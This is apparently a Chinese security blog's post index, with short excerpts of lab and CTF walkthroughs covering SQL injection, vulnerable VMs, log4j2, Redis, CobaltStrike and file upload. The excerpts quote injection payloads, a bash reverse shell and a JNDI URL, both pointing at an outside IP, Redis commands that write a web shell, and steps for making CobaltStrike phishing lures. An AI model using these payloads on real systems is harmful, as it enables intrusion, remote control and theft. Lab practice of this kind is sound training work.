- 博客(40)
- 收藏
- 关注
RSS订阅原创 sqli-libs通关教程(51-65)
id=1 and updatexml(1,concat(1,(select group_concat(column_name) from Information_schema.columns where table_name='表名' )),1)--+id=1 and updatexml(1,concat(1,(select group_concat(字段) from challenges.表名 )),1)--+同六十二,闭合变为 '?同六十二,闭合变为 "?
2025-08-13 19:02:04
2217
原创 sqli-libs通关教程(41-50)
参数变了,让我们使用sort参数,1,2,3都是数据库表,只是排序不一样。想要注入的话,使用updatexml进行。数字型注入,不返回报错信息,使用时间盲注。多了一个单引号闭合,可以使用报错注入。执行后,再次sort=1,添加成功。同四十六关,不过也能使用堆叠注入。数字型注入, 更改用户名。同上关,闭合修改为 ')抓包,尝试添加账号密码。同上关,闭合多一个 '同四十二关,语句一样。同四十三关,语句一样。
2025-08-12 19:39:06
554
原创 如何网络“钓鱼”,钓鱼鱼饵生成工具CobaltStrike使用
有效载荷--->Payload生成器--->选择监听器--->选择Powershell Command--->生成txt文件。生成内容为编码,只需复制内容,将其放入cmd执行就可以,cmd执行完会立即关闭,是正常的。写一个html文件,内容为方框中,将生成的代码替换句中,复制替换完成后,在。站点管理--->文件托管--->选择刚才生成的文件 运行。有效载荷--->office宏--->选择监听器--->复制。攻击--->Web投递--->进行配置--->⽣成。
2025-08-11 19:51:07
893
原创 CobaltStrike的搭建和使用
链接: https://pan.baidu.com/s/1CRd1x4r6EIk14BD3UCLgxw?将下载的文件分别放在服务器和 本地/kali 上 也就是服务器为服务端,本地/kali为客户端。开启服务 ./teamserver 服务器ip 你想要设置的密码。先点击三个点,选择刚刚添加的监听器,输出模式使用Windows exe 生成。1处设置名字,2处添加自己的服务器ip,其他默认就行,若端口被占用就换一个。通过网盘分享的文件:CS4.7key-mht.zip。
2025-08-11 17:30:16
363
原创 Doubletrouble靶机练习
在修改个人信息的地方有文件上传按钮,我们可以尝试上传,看看能不能上传到我们之前找到的文件上传目录。开启监听后,访问一下1.php文件,就可以反弹shell了。发现有密码,应该有东西,破解一下试试。但我们确实是上传成功了,连接一下。vb打开虚拟机,网络设置为桥接。secret目录,有一张图片。下载下来,看看有没有隐写。反弹shell,开启监听。利用网站生成一个木马。查看output文件。
2025-08-10 23:18:25
269
原创 Drippingblues靶机练习
尝试一下dirp传参,利用上面robots.txt文件中的路径文件,成功,说明存在文件包含漏洞。如果之前没下载,下载完成后,需要进入/usr/share/wordlists目录执行。gzip -d rockyou.txt.gz 将字典解压出来。ls时,发现有压缩包,下载查看。下载完,回到我们的目录下解压。robots.txt文件。尝试ssh登录,登陆成功。
2025-08-10 19:55:35
181
原创 Beelzebub靶机练习
发现在uploads目录的talk to valak的cookie里面发现一个password。在这个页面,任意提交一个数据,会在cookie中出现密码字段的数据。在查看index.php时,发现404 但我们扫描到是200。使用wpscan扫描一下看是否存在可利用漏洞。找到的能访问的页面,依次访问看看都是什么。要我们把beelzebub进行md5加密。将加密后的拼接到网址后面,再扫描一次。列出的文件中有历史命令文件,查看一下。网络选择桥接模式,kali也为桥接。有提权命令,我们也执行一下。
2025-08-10 19:11:12
168
原创 sqli-libs通关教程(21-30)
第二十一关 同二十关 为HTTP头部注入中对Cookie注⼊值的注入登录一下进行抓包 语句写入Cookie值中,但我们发现uname进行了加密,采用base64加密,我们的sql注入语句也要使用加密后的也可在浏览器器中进行注入(按F12 应用程序或存储中可找到)尝试闭合,闭合符号也要经过转码 发现闭合符号为') --> Jyk= ')# --> Jykj查询数据库获取表名获取字段名获取username具体值。
2025-08-04 19:25:50
1842
原创 ELECTRICAL靶场练习
尝试进行抓取数据包然后爆破,以前面两个用户名为测试,使用。,发现一个文本域,向下居然有内容,并且还是某一个的私钥。开始攻击后,等一会即可发现成功获取一个,用户名。端口,不过这里的端口大部分都是不确定的情况。尝试进行登录,可以看到对私钥进行了加密操作。漏洞,发现并没有可利用的,那么在这个。浏览器插件wappalyzer。输入密码进行登录,登录后发现是。界面,之前也搜索过对应版本的。端口,进行处理,只取端口号。尝试进行枚举,发现两个分享。,访问之后,发现有很多功能。端口号很多,尝试精确扫描。
2025-08-03 16:42:55
307
原创 Noob靶场练习
放到kali中 两张图片需要使用steghide进行解密获得隐藏的信息。尝试登录ssh 密码是this one is a simple one。提示我们把它旋转一下,应该是rot13加密,解密得到。出现了python文件,查看代码里面的内容。账号密码都是Anonymous。点击about us会下载文件。有分割,应该是账号密码,登录。bmp文件 密码sudo。vm导入,选择桥接模式。base64编码,解密。
2025-08-03 15:47:18
198
原创 Corrosion2靶场
尝试破解 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip。tomcat是manager页面,可以登录。扫描目录发现zip文件,下载。自己写war包上传会出现报错。看到有用户文件,查看一下。导入vb,设置为桥接。使用msf来上传木马。
2025-08-03 15:19:20
318
原创 常见的框架漏洞
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("想要执行的命令")]=&password=&repeatedPassword=/struts2-showcase/${(123+123)}/actionChain1.action拼接后,可以看到数字相加。可以使用url解码下面一大段内容,还原,将其中的反弹shell的base64编码语句换成自己的。vulhub靶场 /shiro/CVE-2016-4437。
2025-08-03 11:48:38
936
原创 Thales靶机
pty.spawn("/bin/bash")' 升级下shell窗口。在应用程序列表中我们可以进行文件上传和服务部署,因此构造一个反弹shell进行部署,生成反弹shell。然后将upfine.war文件进行上传部署并点击upfine进行访问,成功获得shell权限。use 0 这里的0是上面扫描login出来的序号,扫出来多少填多少。打开kali,扫描主机 172.16.2.7。得出账号密码tomcat role1。看一下8080端口tomcat。
2025-07-30 20:23:07
224
原创 ica1靶机练习
给出了mysql的账号和密码,前面也看到开放的端口有3306,也就是mysql服务启动了。开机后会出现靶机ip,ip会时不时的变,命令不行,记得看一下ip是否变了。尝试进入数据库 正常登录会提示证书不符,后面加一句跳过。使用hydry爆破一下,先写两个文件user和passwd作为字典。使用vb打开虚拟机,选择桥接模式,kali也选择桥接。要登录的话,我们查看第二个漏洞,密码相关。密码是经过加密的,我们去base64解密。在staff中,找到了用户名密码。我们到这个网址查看,下载文件。
2025-07-30 19:40:54
356
原创 常见的cms框架漏洞
PageadminPageadmin源码文件+MSSQL+iis上传文件解压拿WebShell需要知道账号和密码,登录后台/admin/工具----常用工具----文件管理准备一个一句话木马的php文件,再压缩为zip压缩包将压缩包通过上传文件处,进行上传上传成功后,解压可以看到我们上传的木马在根目录蚁剑连接还有一个方法,在应用插件安装处,直接上传压缩包,它会自动解压,但由于该功能需要正版密钥,无法尝试ASPCMS源码文件+iis部署。
2025-07-30 17:25:57
1082
原创 redis得到shell的几种方法
echo -e "\n")>1.txt 记得修改为自己的密钥地址。CONFIG SET dbfilename shell.php 设置文件名为shell.php。CONFIG SET dir /var/www/html 修改存储路径为Web目录。ssh-keygen -t rsa # 默认保存到~/.ssh/id_rsa.pub。
2025-07-29 20:13:44
569
原创 02-Breakout靶机练习
10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息。查找时发现cyber 好像是用户名。解密 .2uqPEfj3D<P'a-3。去20000端口查看,尝试登录,登陆成功。在查看源代码时,发现加密的过后的字符串。vm启动靶机,启动后会给我们ip。kali扫描一下具体端口。
2025-07-29 19:08:54
217
原创 napping-1.0.1靶机练习
查看文件发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell。我们提交 http://172.16.2.63:800/1.html 到网址处。我们之前扫描看到了ssh服务开启,尝试xshell连接登录,新建会话,填写信息,登录。访问网址 http://172.16.2.63 可以看到我们写的文件。是个登录页面,我们没有账号,注册一个。
2025-07-29 18:52:10
444
原创 未授权访问专题
对目标环境在资源管理器中用以下格式访问...如果该服务器开启了匿名登陆,则可直接进行内容查看。十:Kubernetes Api Server未授权访问漏洞。port="15692" 或。存在未授权访问则直接进入到信息页面....不需要登陆。九:Docker Remote API未授权访问漏洞。直接连接执行命令且不需要认证说明存在未授权访问漏洞。六:Jupyter NoteBook未授权访问漏洞。在Kali中使用以下命令进行未授权访问漏洞测试。七:Elasticsearch未授权访问漏洞。
2025-07-28 20:38:17
873
原创 earth靶机练习
翻译得到相关提示,使用了加密算法 XOR,并且有一个testdata.txt文件用于测试加密,用户名是terra,先访问testdata.txt 翻译结果没用。页面:bash -c 'bash -i >& /dev/tcp/39.105.47.83/443 0>&1'扫描一下目录:dirsearch -u http://earth.local/出现一个文件,后缀是上面的其中一个,尝试访问,得出是txt文件。访问http://earth.local/添加到/etc/hosts文件中。
2025-07-27 14:59:12
352
原创 red靶场
状态码为500猜测这个页面可能存在漏洞,使用wfuzz测试一下参数,字典也用github上面提供的字典文件,路径换自己上传文件的地址。下载一下,导入到kali中 命令需要修改文件地址,变为你字典放到kali的位置。前面得出hashcat,将密码保存到pass.txt文件使用hashcat规则进行破解。经过查询,Mr. Miessler是github上的一个字典。先写一个pass.txt,将密码保存到当前路径,再执行命令。页面,进行访问,发现是一片空白,说明存在这个页面。
2025-07-27 12:55:54
515
原创 jangow-01-1.0.1靶机练习
在我们的主机上可以监听到,使用虚拟机也可以,ip改为自己虚拟机的ip。我们尝试访问这些页面,在访问到buscar时,url处出现了参数。我们写一个试试id试试,发现它能执行系统命令。这里只能使用443端口,其他被禁用了。开启我们的kali,进行目录扫描。使用vb虚拟机开启靶机。用蚁剑连接,可以连接。
2025-07-25 17:18:31
169
原创 支付逻辑漏洞练习
查看我们的余额,发现为6000,这时我们再去购买,订单就变为正常订单了。我们试着去买个东西,将数量改为-1,进行购买。cmseasy下载后解压到phpstudy中。我们利用这个余额再购买正常产品,使用余额支付。我们首先注册账户并登录,完成后进入该页面。随便填一下信息,付款方式选择站内扣款。这是后面一个订单,订单看起来正常。我们随便点击一个产品进行购买。查看我们的账户余额,为0。这是我们为-1时的订单。填写完成后,开始安装。我们登录后台查看订单。
2025-07-25 16:02:25
320
原创 Web-Machine-N7靶机练习
查询后发现,kali本该扫描出一个目录enter_network来,但可能是字典不够全面,我们没找到。发现cookie和role中有加密的数据,cookie不用看,我们对role中的内容进行解密。进行抓包,将内容发到重放器中,将role的值改为admin,再将网址改为admin.php。上传失败,但url连接处有localhost,我们查看文件上传页面的源代码。profile.php上面我们访问过,是空白,访问另一个。我们使用admin登录,尝试抓包,密码任意。知道了密码,我们登录,发现页面不变,
2025-07-24 19:10:05
391
原创 matrix-breakout-2-morpheus靶场练习
可以看到,它将我们的输入内容追加到了刚才的页面,既然这个页面无法注入木马,我们换一个地址。如果未下载gobuster,执行命令后会帮助我们下载。虽然页面多加了一行,但木马似乎没用,或是被拦截了。可能是我们查找的不够深,换一个后台扫描工具。访问一下1.php,文件存在,尝试蚁剑连接。1.查看靶机设置,设置为nat,查找主机。我们在页面上输入一个1,页面会显示一个1。访问一下这些文件,没有什么有效信息。靶机的终端运行php mu.php。利用kali的最大的字典尝试。若下载失败,更新一下。
2025-07-24 16:55:00
449
原创 ctfhub-web进阶-PHP-Bypass disable_function练习
页面有木马,我们利用一下查看页面源代码发现它将绝大多数函数禁用了我们直接使用蚁剑连接连接成功,进去找一下flag在根目录下找到了两个文件 flag中没有内容 readflag是读取flag文件进入虚拟终端发现也不能执行命令利用蚁剑中的绕过禁用函数插件依次尝试下面的选择,点击开始第一个就生成成功了我们可以在网页目录可以找到,复制名称,新建一个木马进行连接打开终端就能直接读取。
2025-07-23 20:37:08
467
原创 log4j2漏洞复现
将我们的jdk1.8中的第二条 ldap://39.105.47.83:1389/7dwty1进行替换。复制jdk1.8中的第二条 ldap://39.105.47.83:1389/7dwty1。是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然⽽在2021年末。nc -lvvp 6666 上文中反弹shell中地址的端口。log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。我们可以看到我们主机可以进行控制,输入命令了。将我们的JNDI放到项目目录下。
2025-07-23 20:24:43
498
原创 中间件的解析漏洞(iis6、iis7、nginx、apache)
在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。中间件为iis6的网站部署完成我们写入一个1.txt文件,一个a.asp目录,在目录中还有一个1.txt文件内容为 <%=new()%> 这是一段显示当前时间的asp代码我们查看文件1.txt 可以看到文件内容没有被解析再打开a.asp目录下的1.txt发现它被解析了畸形文件解析在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;
2025-07-22 19:39:13
826
原创 tomato靶机练习
利用日志的保留访问记录来将我们的木马上传 ssh的日志文件 var/log/auth.log。扫描同一网段,查找主机,这里我们使用kali的nmap,既能找到主机,也能查看开启的端口。在页面最后出现了passwd文件内容,说明存在文件包含漏洞。可以看到我们的字符有些被编码了,尝试抓包来保证字符不被修改。所以直接尝试蚁剑连接,来检验我们的木马是否成功输入。查看info.php,出现了php的配置信息。下载完靶机后,直接运行,选择安装路径后。发现可能存在文件包含漏洞。改回我们原本的内容,放行。
2025-07-21 18:26:11
387
原创 AI-web1.0 靶机练习
访问 http://192.168.88.133/se3reTdir777/uploads/1.php。查找主机 我们设置的是vmnet8 192.168.88.0查找相同网段的主机。采用另一种方法 上传木马 ,我们知道网站的绝对路径,可以使用抓包在uid处直接写入。扫描到一个info.php网页 查看网页。一台是我们的电脑,另一个就是我们的靶机。有一个index.php文件。1.解压,打开文件vmx。我们查找一下另一个目录。我们可以尝试sql注入。可以找到网页绝对路径。
2025-07-20 20:45:39
554
原创 文件上传漏洞 Upload-labs靶场攻略
第一关为JS绕过,需要修改页面代码代码中有个上传的文件检测函数,我们需要删除这里修改完成后,将我们写的php一句话木马上传上去?
2025-07-20 19:08:06
873
原创 xxe靶机通关攻略
利用软件进行主机存在扫描,扫描我们的网段有哪些端口开放,有一个一定是我们的靶机。我们进行构造,admin.php文件内容我们不知道是什么,用它来作为目标。开机后,我们不知道密码这些,首先需要我们自己去找到这台机器。可以看到我们的虚拟机使用的是我们的vmnet8网卡。不理解,文件是php文件,我们可以放到网站上去运行一下。将靶机解压后,会有下列文件,双击xxe.ovf开启。flag全是大写字母和数字,应该是base32加密。解出 L2V0Yy8uZmxhZy5waHA=找到如下网页,便是我们的靶机。
2025-07-17 20:54:30
851
原创 CTFhub web-SSRF练习
尝试访问位于127.0.0.1的flag.php在url=后添加地址http://127.0.0.1/flag.php 就可以看到flag。
2025-07-17 19:36:23
920
原创 墨客学院数据库漏洞通关过程(Oracle数据库、)
登录网站,可以看到在公告处有我们能够进行sql注入的点1.首先判断能否注入1 and 1=1 页面正常1 and 1=2 页面错误,说明sql注入语句生效,可以进行注入2.判断列数使用1 order by 2 页面正常1 order by 3 页面错误,说明有两列3.判断回显orcale不支持使用union select 只支持union select from 且不支持联合查询数字字符通过给null加单引号变成字符串来判断回显位置4.判断数据库名称。
2025-07-14 20:33:31
872
原创 sqli-libs通关教程(11-20)
在输入闭合符号后,发现地址栏未变化,说明采用post请求,为了方便,我们使用burpsuite抓包进行操作抓包后将请求发送到重放器中首先使用 ' or 1=1# 来测试进行闭合,发现可行,--+不可行,采用联合注入测试字段 ' order by 3 #出错,也就是有2个字段判断显错位置查询当前使用的数据库查询库中的表查询表中字段查询具体信息。
2025-07-13 20:46:22
927
原创 sqli-libs通关教程(1-10)
id=1 and 1=1 --+和?id=1 and 1=2 --+ 发现页面不会产生变化 说明不是数字行注入。id=1' order by 1--+ 再将1替换为2,3,4,在到4时,页面发生变化。id=1' and 1=1 --+和?id=1' and 1=2 --+ 页面发生变化,说明第一关使用的是字符型注入。id=-1' union select 1,database(),3 --+id=-1' union select 1,2,3 --+5.users表最符合我们的要求,先查看它。
2025-07-09 19:25:24
442
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人